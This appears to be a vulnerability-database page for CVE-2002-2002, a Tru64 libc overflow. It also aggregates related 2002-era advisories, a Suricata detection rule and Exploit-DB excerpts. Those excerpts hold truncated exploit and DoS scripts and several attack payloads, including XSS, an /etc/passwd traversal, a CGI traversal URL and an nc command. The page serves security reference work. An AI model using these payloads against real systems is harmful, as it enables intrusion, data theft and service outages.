CVE-2002-2002
Published 2002-12-31
CVE-2002-2002: Buffer overflow in libc in Compaq Tru64 4.0F, 5.0, 5.1 and 5.1A allows attackers to execute arbitrary code via long (1) LANG and (2) LOCPATH environment…
Priority: P4
CVSS 2.0: 7.5 HIGH
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EPSS: 2.68% (83.9th percentile)
Buffer overflow in libc in Compaq Tru64 4.0F, 5.0, 5.1 and 5.1A allows attackers to execute arbitrary code via long (1) LANG and (2) LOCPATH environment variables.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
| compaq | tru64 | — | — |
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vendor_redhat | — | 7.5 | HIGH | — |
GHSA
GHSA-2q29-9457-5vhh: Buffer overflow in libc in Compaq Tru64 4
ghsa_unreviewed·2022-04-30
CVE-2002-2002 [HIGH] GHSA-2q29-9457-5vhh: Buffer overflow in libc in Compaq Tru64 4
Buffer overflow in libc in Compaq Tru64 4.0F, 5.0, 5.1 and 5.1A allows attackers to execute arbitrary code via long (1) LANG and (2) LOCPATH environment variables.
Red Hat
security flaw
vendor_redhat·2002-10-14·CVSS 7.5
CVE-2002-0836 [HIGH] security flaw
dvips converter for Postscript files in the tetex package calls the system() function insecurely, which allows remote attackers to execute arbitrary commands via certain print jobs, possibly involving fonts.
Cisco
Microsoft Windows SMB Denial of Service Vulnerabilities in Cisco Products - MS02-045
vendor_cisco·2002-09-18
CVE-2002-0724 CWE-119 Microsoft Windows SMB Denial of Service Vulnerabilities in Cisco Products - MS02-045
This advisory describes vulnerabilities that affect Cisco products and applications that are installed on Microsoft operating systems incorporating the use of the Server Message Block (SMB) file sharing protocol. It is based on the vulnerabilities in Microsoft's SMB protocol, not due to a defect of the Cisco product or application.
Vulnerabilities were discovered that enable an attacker to perform a denial of service against the server and may allow execution of arbitrary code. These vulnerabilities were publicly announced by Microsoft in their Microsoft Security Bulletin MS02-045.
All Cisco products and applications that are using the Microsoft operating systems identified by Microsoft in their Micro
Red Hat
security flaw
vendor_redhat·2002-08-05·CVSS 7.5
CVE-2002-0660 [HIGH] security flaw
Buffer overflow in libpng 1.0.12-3.woody.2 and libpng3 1.2.1-1.1.woody.2 on Debian GNU/Linux 3.0, and other operating systems, may allow attackers to cause a denial of service and possibly execute arbitrary code, a different vulnerability than CVE-2002-0728.
Red Hat
security flaw
vendor_redhat·2002-05-02·CVSS 4.6
CVE-2002-0164 [MEDIUM] security flaw
Vulnerability in the MIT-SHM extension of the X server on Linux (XFree86) 4.2.1 and earlier allows local users to read and write arbitrary shared memory, possibly to cause a denial of service or gain privileges.
Red Hat
security flaw
vendor_redhat·2002-03-23·CVSS 5.0
CVE-2002-0353 [MEDIUM] security flaw
The ASN.1 parser in Ethereal 0.9.2 and earlier allows remote attackers to cause a denial of service (crash) via a certain malformed packet, which causes Ethereal to allocate memory incorrectly, possibly due to zero-length fields.
Citrix
Citrix Security Bulletin CTX115245
vendor_citrix·CVSS 4.3
CVE-2002-2426 [MEDIUM] Citrix Security Bulletin CTX115245
CVE References: CVE-2002-2426, CVE-2025-12101, CVE-2025-62626, CVE-2026-23554, CVE-2026-3055, CVE-2026-4368, CVE-2026-4397
Affected Products: Citrix ADM, Citrix Hypervisor, Citrix Virtual Apps and Desktops, Endpoint Management, NetScaler ADC, NetScaler Gateway, XenServer
Cisco
Heap Overflow in Solaris cachefs Daemon
vendor_cisco
CVE-2003-1063 Heap Overflow in Solaris cachefs Daemon
This advisory describes a vulnerability that affects Cisco products and applications that are installed on the Solaris operating system, and is based on the vulnerability of a common service within the Solaris operating system, not due to a defect of the Cisco product or application. A vulnerability in the "cachefs" program was discovered that enables an attacker to execute arbitrary code under Solaris OS. This vulnerability was publicly announced in the CERT Advisory CA-2002-11. All Cisco products and applications that are installed on Solaris OS are considered vulnerable to the underlying operating system vulnerability, unless the workaround was applied. This vulnerability is described in
CWE: CWE-119
Cisco
Microsoft IIS Vulnerabilities in Cisco Products - MS02-018
vendor_cisco
CVE-2002-0149 Microsoft IIS Vulnerabilities in Cisco Products - MS02-018
This advisory describes a vulnerability that affects Cisco products and applications that are installed on Microsoft operating systems incorporating the use of the Internet Information Server (IIS), and is based on the vulnerability of IIS, not due to a defect of the Cisco product or application. A number of vulnerabilities were discovered that enable an attacker to execute arbitrary code or perform a denial of service against the server. These vulnerabilities were discovered and publicly announced by Microsoft in their Microsoft Security Bulletin MS02-018. This advisory is available at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20020415-ms02-018.
Suricata
GPL FTP CWD overflow attempt
suricata·2010-09-23
CVE-1999-0219 GPL FTP CWD overflow attempt
Rule: alert ftp $EXTERNAL_NET any -> $HOME_NET any (msg:"GPL FTP CWD overflow attempt"; flow:established,to_server; content:"CWD"; nocase; isdataat:100,relative; pcre:"/^CWD\s[^\n]{100}/smi"; reference:bugtraq,11069; reference:bugtraq,1227; reference:bugtraq,1690; reference:bugtraq,6869; reference:bugtraq,7251; reference:bugtraq,7950; reference:cve,1999-0219; reference:cve,1999-1058; reference:cve,1999-1510; reference:cve,2000-1035; reference:cve,2000-1194; reference:cve,2001-0781; reference:cve,2002-0126; reference:cve,2002-0405; classtype:attempted-admin; sid:2101919; rev:25; metadata:created_at 2010_09_23, cve CVE_1999_0219, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08;)
Exploit-DB
FTPShell Client 5.24 - 'Create NewFolder' Local Buffer Overflow
exploitdb·2016-02-04
---
#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
#[+] Exploit Title: FTPShell Client (Add New Folder) Local Buffer Overflow
#[+] Date: 2/2/2016
#[+]Exploit Author: Arash Khazaei
#[+] Vendor Homepage: www.ftpshell.com
#[+]Software Link: http://www.ftpshell.com/download.htm
#[+] Version: 5.24
#[+] Tested on: Windows XP Professional SP3 (Version 2002)
#[+] CVE : N/A
#[+] introduction : Add New Folder In Remote FTP Server And In Name Input Copy Buffer.txt File content
#[+] or click on Remote Tab Then Click On Create Folder And Copy Buffer.txt In Name Input ...
#[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
#!/usr/bin/python
filename = "buffer.txt"
# Junk A
junk = "A"*452
#
Exploit-DB
Microsoft Excel - HFPicture Record Parsing Remote Code Execution
exploitdb·2010-09-16·CVSS 9.3
CVE-2010-1248 [CRITICAL] Microsoft Excel - HFPicture Record Parsing Remote Code Execution
---
'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ < (day 16 binary anlysis)
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/
'''
Title : Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability
Version : Excel 2002 SP3
Analysis : http://www.abysssec.com
Vendor : http://www.microsoft.com
Impact : High
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
CVE : CVE-2010-1248
here is BA : http://www.exploit-db.com/maoub-16-microsoft-excel-hfpicture-record-parsing-remote-code-execution-vulnerability/
here is the PoC : https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploit
Exploit-DB
PuTTy.exe 0.53 - Validation Remote Buffer Overflow (Metasploit)
exploitdb·2006-05-15
CVE-2002-1359 PuTTy.exe 0.53 - Validation Remote Buffer Overflow (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::putty_ssh;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
use POSIX;
my $advanced =
{
};
my $info =
{
'Name' => 'PuTTy.exe $Revision: 1.1 $',
'Authors' => [ 'y0 [at] w00t-shell.net' ],
'Description' =>
Pex::Text::Freeform(qq{
This module exploits a buffer overflow in the PuTTY SSH client that is triggered
throug
Exploit-DB
3Com SuperStack 3 NBX 4.0/4.1 - FTPD Denial of Service
exploitdb·2002-12-02
CVE-2002-2300 3Com SuperStack 3 NBX 4.0/4.1 - FTPD Denial of Service
---
source: https://www.securityfocus.com/bid/6297/info
It has been reported that the ftpd server, included in the Embedded Real Time Operating System (ERTOS) of 3Com Superstack 3 NBX IP phones, contains a denial of service vulnerability. This issue can be triggered by sending a CEL parameter of excessive length, effectively causing the ftpd server and various VoIP services to no longer respond.
It should be noted that this issue may be similar to the vulnerability described in BID 679.
Although unconfirmed, it should also be noted that due to the nature of this vulnerability under some circumstances it may be exploited to execute arbitrary code.
CEL aaaa[...]aaaa where string is 2048 bytes long
Exploit-DB
IISPop 1.161/1.181 - Remote Buffer Overflow (Denial of Service) (PoC)
exploitdb·2002-11-14
CVE-2002-2404 IISPop 1.161/1.181 - Remote Buffer Overflow (Denial of Service) (PoC)
---
source: https://www.securityfocus.com/bid/6183/info
IISPop is vulnerable to a denial of service caused by a buffer overflow. By sending an unusually large amount of data to IISPop on TCP port 110, the application will terminate with an access violation. Arbitrary code execution may be possible.
#!/usr/bin/perl -w
# tool : iispdos.pl
# shutdown all version of IISPop
# greetz crack.fr , marocit ,christal
#
use IO::Socket;
$ARGC=@ARGV;
if ($ARGC !=1) {
print "\n-->";
print "\tUsage: perl iispdos.pl \n";
exit;
}
$remo = $ARGV[0];
$buffer = "A" x 289999;
print "\n-->";
print "\tconnection with $remo\n";
unless ($so = IO::Socket::INET->new (Proto => "TCP",
PeerAddr => $remo,
PeerPort
=> "110"))
{
print "-->";
print
Exploit-DB
Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (3)
exploitdb·2002-10-18
CVE-2002-1561 Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (3)
---
source: https://www.securityfocus.com/bid/6005/info
The Microsoft Windows RPC service contains a flaw that may allow a remote attacker to cause a denial of service. By sending a specifically malformed packet to TCP port 135, the RPC service will be disabled.
This vulnerability was originally reported to only affect Windows 2000. Microsoft has confirmed that Windows NT 4.0 and XP are also vulnerable.
It has been reported that installation of the provided patch will cause some problems in IIS environments. Specifically, users who are using COM+ in IIS environments may experience problems with ASP transactions.
A variant of this issue has been reported which allegedly affects patched systems. It is apparently possi
Exploit-DB
Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (1)
exploitdb·2002-10-09
CVE-2002-1230 Microsoft Windows XP/2000/NT 4.0 - NetDDE Privilege Escalation (1)
---
// source: https://www.securityfocus.com/bid/5927/info
The Winlogon NetDDE Agent can be leveraged to allow local privilege escalation. This is related to the Microsoft Windows Window Message Subsystem Design Error Vulnerability (BID 5408). A local user can use a WM_COPYDATA message to send arbitrary code to NetDDE, which will be executed with Local System privileges when a second WM_TIMER message is sent.
//
/////////// Copyright Serus 2002////////////////
//mailto:[email protected]
//
//This program check system on winlogon bug present
//Only for Windows 2000
//This is for check use only!
//
#include <windows.h> // header names were lost in extraction; windows.h (DWORD, BOOL) and stdio.h restored here as an assumption
#include <stdio.h>
void main(int argc, char *argv[ ], char *envp[ ] )
{
char *buf;
DWORD Addr = 0;
BOOL bExec = TRUE;
uns
Exploit-DB
Jetty 3.1.6/3.1.7/4.1 Servlet Engine - Arbitrary Command Execution
exploitdb·2002-10-02
CVE-2002-1178 Jetty 3.1.6/3.1.7/4.1 Servlet Engine - Arbitrary Command Execution
---
source: https://www.securityfocus.com/bid/5852/info
A flaw in the CGIServlet in Jetty allows an attacker to execute arbitrary commands on the server. Specifically, it is possible for an attacker to use directory traversal sequences and cause the CGIServlet to execute attacker-specified commands (such as running executables on the host).
This vulnerability affects Jetty versions for Microsoft Windows prior to 4.1.0.
http://jetty-server:8080/cgi-bin/..\..\..\..\..\..\winnt/notepad.exe
Exploit-DB
DB4Web 3.4/3.6 - Connection Proxy
exploitdb·2002-09-17
CVE-2002-1484 DB4Web 3.4/3.6 - Connection Proxy
---
source: https://www.securityfocus.com/bid/5725/info
DB4Web is an application server that allows read and write access to relational databases and other information sources, via the web. The application is available for Windows, Linux, and various Unix platforms.
By requesting a specially crafted URL, it is possible to initiate a TCP connect from the vulnerable server to a remote IP address and arbitrary port.
The server will then produce a debug page, which can be used to determine port status on the scanned host.
http://127.0.0.1/DB4Web/172.31.93.30:22/foo
Exploit-DB
Netris 0.3/0.4/0.5 - Remote Memory Corruption
exploitdb·2002-09-09
CVE-2002-1566 Netris 0.3/0.4/0.5 - Remote Memory Corruption
---
// source: https://www.securityfocus.com/bid/5680/info
Netris is prone to a remotely exploitable memory corruption issue. An attacker may exploit this to execute arbitrary code with the privileges of the user invoking the vulnerable application.
/*[ netris[v0.5]: client/server remote buffer overflow exploit. ]*
* *
* by: vade79/v9 [email protected] (fakehalo/realhalo) *
* *
* netris homepage/URL: *
* http://www.netris.org *
* ftp://ftp.netris.org (v0.52 fixes this bug) *
* *
* compile: *
* cc xnetris.c -o xnetris *
* *
* this exploits the netris buffer overflow found roughly a year *
* ago(https://www.securityfocus.com/bid/5680), and recently *
* brought up again,
Exploit-DB
phpGB 1.1 - HTML Injection
exploitdb·2002-09-09
CVE-2002-1480 phpGB 1.1 - HTML Injection
---
source: https://www.securityfocus.com/bid/5676/info
phpGB is subject to HTML injection attacks.
phpGB fails to check for the presence of HTML tags when generating guestbook entries. It is reported that an attacker may inject HTML and script code into guestbook entries, which will be executed in the web client of the administrative guestbook user when the admin attempts to delete the entry.
Enter the following guestbook entry:
"delete me alert(document.cookie)"
Exploit-DB
Microsoft Outlook Express 5/6 - MHTML URL Handler File Rendering
exploitdb·2002-08-15
CVE-2002-0980 Microsoft Outlook Express 5/6 - MHTML URL Handler File Rendering
---
source: https://www.securityfocus.com/bid/5473/info
Microsoft Outlook Express introduced a URL handler called MHTML (MIME Encapsulation of Aggregate HTML). This allows Internet Explorer to pass MHTML files to Outlook Express for rendering.
The MHTML URL handler does not validate the file type it is rendering. This could allow a file type that is normally considered to be a "safe file type", such as a .txt file, to be opened and have any script contained within rendered. This script would then be rendered in the Local Computer Zone.
malware.com
function malware(){
document.body.navigate("http://www.microsoft.com");alert("malware");
open("file://C%3A%5CWINDOWS%5CTemp%5Cwecerr.txt")
}
Exploit-DB
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (2)
exploitdb·2002-08-06
CVE-2002-1230 Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (2)
---
// source: https://www.securityfocus.com/bid/5408/info
A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely affects almost every Win32 window-based application. Attackers with local access may exploit this vulnerability to elevate privileges if a window belonging to another process with higher privileges is present. One example of such a process is antivirus software, which often must run with LocalSystem privileges.
** Microsoft has released a statement regarding this issue. Please see the References section for details.
A paper, entitled "Win32 Message Vulnerabilities Redux" has been publ
Exploit-DB
Microsoft Internet Explorer 5/6 / Konqueror 2.2.2/3.0 / Weblogic Server 5/6/7 - Invalid X.509 Certificate Chain
exploitdb·2002-08-06
CVE-2002-1183 Microsoft Internet Explorer 5/6 / Konqueror 2.2.2/3.0 / Weblogic Server 5/6/7 - Invalid X.509 Certificate Chain
---
source: https://www.securityfocus.com/bid/5410/info
A flaw has been reported in the handling of X.509 certificates by a number of products, including several web browsers. It may be possible for a malicious party to create certificates for arbitrary domains, which will be treated as trusted by the vulnerable browser.
The flaw lies in the handling of intermediate certificate authorities. Normally, intermediate certificates should possess a Basic Constraints field which states the certificate may be used as a signing authority.
Vulnerable products do not require the Basic Constraints field be properly defined. A malicious party with one valid certificate may sign a new cer
Exploit-DB
CodeBlue 5.1 - SMTP Response Buffer Overflow
exploitdb·2002-07-24
CVE-2002-0280 CodeBlue 5.1 - SMTP Response Buffer Overflow
---
// source: https://www.securityfocus.com/bid/5300/info
CodeBlue is an Apache httpd log scanning utility that attempts to contact the administrators of hosts infected with worms.
A buffer overflow vulnerability has been reported in CodeBlue. The condition occurs when processing responses from SMTP servers. It may be possible for malicious SMTP servers to execute shellcode on hosts running CodeBlue.
/*
* hi, this is an exploit that doesnt work. it should be enough of a point in
* the right direction though. the overflow is in get_smtp_reply(), codeblue.c
* is pretty damn poor, there are more!!!
*
*
* To use this against a webserver (A) using codeblue.
*
* $ printf "GET /scripts/root.exe\r\n\r\n" | nc A 80
*
* this will add an entry in the
Exploit-DB
Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (3)
exploitdb·2002-06-29
CVE-2002-1814 Mandrake 7/8/9 / RedHat 6.x/7 Bonobo EFSTool - Commandline Argument Buffer Overflow (3)
---
// source: https://www.securityfocus.com/bid/5125/info
Bonobo is a set of tools and CORBA interfaces included as part of the Gnome infrastructure. It is designed for use on the Linux and Unix operating systems.
A boundary condition error has been discovered in the efstool program. Due to improper bounds checking, it is possible for a user to supply a long commandline argument to the efstool program, which would result in a buffer overflow. This problem could be exploited on the local system to overwrite stack memory, including the return address, and execute attacker supplied code.
/*
Author: N4rK07IX
[email protected] || [email protected] (i think this is useless pop3 box,never checked, in
Exploit-DB
OpenSSH 3.x - Challenge-Response Buffer Overflow (2)
exploitdb·2002-06-24
CVE-2002-0640 OpenSSH 3.x - Challenge-Response Buffer Overflow (2)
---
source: https://www.securityfocus.com/bid/5093/info
The OpenSSH team has reported two vulnerabilities in OpenSSH that are remotely exploitable and may allow for unauthenticated attackers to obtain root privileges.
The conditions are related to the OpenSSH SSH2 challenge-response mechanism. They occur when the OpenSSH server is configured at compile time to support BSD_AUTH or SKEY. OpenBSD 3.0 and later ship with OpenSSH built to support BSD_AUTH. Systems are vulnerable when either of the following configuration options are enabled:
PAMAuthenticationViaKbdInt
ChallengeResponseAuthentication
Attackers can exploit the vulnerabilities by crafting a malicious response. Since this occurs before the authentication process completes,
Exploit-DB
Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (2)
exploitdb·2002-05-24
CVE-2002-1827 Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (2)
---
// source: https://www.securityfocus.com/bid/4822/info
Sendmail is a MTA for Unix and Linux variants.
There is a vulnerability in Sendmail that will lead to a denial of service condition. The vulnerability occurs when a malicious user acquires an exclusive lock on files that Sendmail requires for operation.
#include <stdio.h>  /* header names were lost in extraction; stdio.h and unistd.h (fork) restored here as an assumption */
#include <unistd.h>
/*
Stupid piece of code to test the sendmail lock vulnerability on
FreeBSD. Run this and try sendmail -t on FreeBSD for example.
More info: http://www.sendmail.org/LockingAdvisory.txt
zillion (at safemode.org && snosoft.com)
http://www.safemode.org
http://www.snosoft.com
*/
int main() {
if(fork() == 0) {
char *lock1 = "/etc/mail/aliases";
char *lock2 = "/etc/mail/aliases.db";
char
Exploit-DB
GNU Mailman 2.0.x - Admin Login Cross-Site Scripting
exploitdb·2002-05-20
CVE-2002-0388 GNU Mailman 2.0.x - Admin Login Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/4825/info
GNU Mailman is prone to a cross-site scripting vulnerability. An attacker may construct a malicious link to the administrative login page, which contains arbitrary HTML and script code.
A user visiting the link will have the attacker's script code executed in their web browser in the context of the site running the vulnerable software.
http://target/mailman_directory/admin/ml-name?adminpw="><br
Exploit-DB
Jon Howell Faq-O-Matic 2.7 - Cross-Site Scripting
exploitdb·2002-04-20
CVE-2002-2011 Jon Howell Faq-O-Matic 2.7 - Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/4565/info
Faq-O-Matic 2.711 and 2.712 are versions of a web-based Frequently Asked Question (FAQ) management system. They are vulnerable to a cross site scripting issue arising from a failure to filter HTML or script from a malformed query, returning the submitted script as an error message which is then processed by the browser. This is done by submitting the script as an argument to the Faq-O-Matic component "fom.cgi", specifically to the "file" parameter. This script is then treated by the user's browser as though it originated from the Faq-O-Matic web site.
http://www.wherever.tld/path_to_Faq-O-Matic/fom?file=alert('If+this+script+was+modified,+it+could+easily+steal+amigadev.net+cookies+and+log+them+t
Exploit-DB
OpenBSD 2.9/3.0 - Default Crontab Root Command Injection
exploitdb·2002-04-11
CVE-2002-0542 OpenBSD 2.9/3.0 - Default Crontab Root Command Injection
---
/*
source: https://www.securityfocus.com/bid/4495/info
OpenBSD ships with a number of cron jobs configured by default. The tasks are for the purpose of summarizing system information.
The mail(1) utility is used to send the summaries to the root user. This utility supports escaped characters in message text indicating commands to be executed during processing.
If attacker-supplied data can be included in the message text passed to mail(1), commands specified by the attacker may be executed as root. If the attacker embeds the escape sequence followed by an arbitrary command in this data, the commands will be executed as root when the cron task runs. It is possible for an attacker to embed data in filenames, which are included
Exploit-DB
Trend Micro Interscan VirusWall 3.5/3.6 - Content-Length Scan Bypass
exploitdb·2002-03-11
CVE-2002-0440 Trend Micro Interscan VirusWall 3.5/3.6 - Content-Length Scan Bypass
---
// source: https://www.securityfocus.com/bid/4265/info
Trend Micro InterScan VirusWall is a high performance internet gateway virus scanning package. It is capable of scanning incoming content over HTTP, SMTP and FTP for viruses and malicious code.
A vulnerability has been reported in some versions of VirusWall. An option exists called "Skip scanning if Content-length equals 0", which is enabled by default. A malicious web server may return infected content with this header set to 0, and bypass the VirusWall scanner. As many popular client programs will ignore this header and display the content, this may allow malicious content to bypass VirusWall and still be interpreted by a client system.
Other versions of Vi
Exploit-DB
Hanterm 3.3 - Local Buffer Overflow (2)
exploitdb·2002-02-07
CVE-2002-0239 Hanterm 3.3 - Local Buffer Overflow (2)
---
// source: https://www.securityfocus.com/bid/4050/info
Hanterm is a replacement for xterm which includes Hangul support, used for Korean language systems.
A buffer overflow error exists in hanterm. If it is called locally with a maliciously constructed parameter, it is possible to overflow a buffer. This can result in the return address of a stack frame being overwritten, and lead to the execution of arbitrary code.
As hanterm runs suid root on some systems, exploitation of this vulnerability may result in a local root compromise.
/* hanterm_exp.c
*
* local exploit for hanterm
* .. tested in TurboLinux Server 6.5 (Japan)
*
* thanks my Japanese friend kaju(kaijyu)
* and Japanese hacker UNYUN.
*
* by [email protected]
* 2002/02/07
*/
#includ
Exploit-DB
Portix-PHP 0.4 - 'index.php' Directory Traversal
exploitdb·2002-02-04
CVE-2002-2084 Portix-PHP 0.4 - 'index.php' Directory Traversal
---
source: https://www.securityfocus.com/bid/4038/info
Portix-PHP is freely available web portal software. It is written in PHP and will run on most Unix and Linux variants.
Portix-PHP is prone to directory traversal attacks. The script index.php does not sufficiently filter '../' sequences from web requests, making it possible for an attacker to browse the filesystem of the host running the vulnerable software. Arbitrary web-readable files may be viewed by an attacker.
Successful exploitation may cause sensitive information to be disclosed to the attacker. Information gathered in this manner may be used to aid in further attacks against the host.
www.hostportix.com/index.php?l=../../../etc/passwd
Bugzilla
CVE-2002-1170 security flaw
bugzilla·2018-08-16·CVSS 5.0
CVE-2002-1170 [MEDIUM] CVE-2002-1170 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
The handle_var_requests function in snmp_agent.c for the SNMP daemon in the Net-SNMP (formerly ucd-snmp) package 5.0.1 through 5.0.5 allows remote attackers to cause a denial of service (crash) via a NULL dereference.
Bugzilla
CVE-2002-0659 security flaw
bugzilla·2018-08-16·CVSS 5.0
CVE-2002-0659 [MEDIUM] CVE-2002-0659 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
The ASN1 library in OpenSSL 0.9.6d and earlier, and 0.9.7-beta2 and earlier, allows remote attackers to cause a denial of service via invalid encodings.
Bugzilla
CVE-2002-0704 security flaw
bugzilla·2018-08-16·CVSS 7.5
CVE-2002-0704 [HIGH] CVE-2002-0704 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
The Network Address Translation (NAT) capability for Netfilter ("iptables") 1.2.6a and earlier leaks translated IP addresses in ICMP error messages.
Bugzilla
CVE-2002-1223 security flaw
bugzilla·2018-08-16·CVSS 7.5
CVE-2002-1223 [HIGH] CVE-2002-1223 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Buffer overflow in DSC 3.0 parser from GSview, as used in KGhostView in KDE 1.1 and KDE 3.0.3a, may allow attackers to cause a denial of service or execute arbitrary code via a modified .ps (PostScript) input file.
Bugzilla
CVE-2002-0825 security flaw
bugzilla·2018-08-16·CVSS 7.5
CVE-2002-0825 [HIGH] CVE-2002-0825 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Buffer overflow in the DNS SRV code for nss_ldap before nss_ldap-198 allows remote attackers to cause a denial of service and possibly execute arbitrary code.
Bugzilla
CVE-2002-1397 security flaw
bugzilla·2018-08-16·CVSS 7.5
CVE-2002-1397 [HIGH] CVE-2002-1397 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Vulnerability in the cash_words() function for PostgreSQL 7.2 and earlier allows local users to cause a denial of service and possibly execute arbitrary code via a large negative argument, possibly triggering an integer signedness error or buffer overflow.
Bugzilla
CVE-2002-0162 security flaw
bugzilla·2018-08-16·CVSS 6.2
CVE-2002-0162 [MEDIUM] CVE-2002-0162 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
LogWatch before 2.5 allows local users to execute arbitrary code via a symlink attack on the logwatch temporary directory.
References
http://cert.uni-stuttgart.de/archive/bugtraq/2002/04/msg00219.html
http://ftp.support.compaq.com/patches/.new/html/SSRT-541.shtml
http://www.iss.net/security_center/static/8863.php
http://www.lac.co.jp/security/english/snsadv_e/51_e.html
http://www.securityfocus.com/bid/4544